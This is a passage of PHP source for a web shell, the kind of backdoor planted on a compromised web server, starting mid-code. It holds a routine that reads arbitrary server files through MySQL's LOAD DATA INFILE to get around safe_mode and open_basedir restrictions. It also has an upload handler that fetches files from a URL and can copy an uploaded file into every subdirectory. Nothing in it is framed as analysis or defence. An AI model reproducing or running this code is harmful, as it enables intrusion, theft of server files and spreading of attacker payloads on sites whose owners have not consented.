"; mysql_free_result($result); } if($sql_x=="getfile") { $tmpdb=$sql_login."_tmpdb"; $select=mysql_select_db($tmpdb); if(!$select) { mysql_create_db($tmpdb); $select=mysql_select_db($tmpdb); $created=!!$select; } if($select) { $created=FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result=mysql_query("SELECT * FROM tmp_file;"); if(!$result) { echo "Error in reading file (permision denied)!"; } else { for($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
"; } else { echo "File \"".$sql_getfile."\":
".nl2br(htmlspecialchars($f))."
"; } mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); } } } } echo '
Affected rows: $affected
'; } echo ''; } } elseif(isset($_GET['x'])&&($_GET['x']=='upload')) { if(isset($_POST['uploadcomp'])) { if(is_uploaded_file($_FILES['file']['tmp_name'])) { $path=magicboom($_POST['path']); $fname=$_FILES['file']['name']; $tmp_name=$_FILES['file']['tmp_name']; $pindah=$path.$fname; $stat=@move_uploaded_file($tmp_name,$pindah); $cp_filed=$_POST['cp_filed']; if($stat) { if(isset($cp_filed)) { $dir_open=opendir('.'); while(false!==($filename=readdir($dir_open))) { if($filename!="."&&$filename!="..") { if(is_dir($filename)) { $link=$filename; copy($pindah,$path.$link."/".$fname); } } } closedir($dir_open); } $msg="
File Uploaded To $pindah"; } else $msg="
Failed To Upload $fname"; } else $msg="
Failed To Upload $fname"; } elseif(isset($_POST['uploadurl'])) { $pilihan=trim($_POST['pilihan']); $wurl=trim($_POST['wurl']); $path=magicboom($_POST['path']); $namafile=download($pilihan,$wurl); $pindah=$path.$namafile; if(is_file($pindah)) { $msg="
File Uploaded To $pindah"; } else $msg="
Failed To Upload $namafile"; } ?>
Upload From Computer
Copy To All Sub Directories
Upload From Url
URL


[ Shell By ]
Allright Reserved ©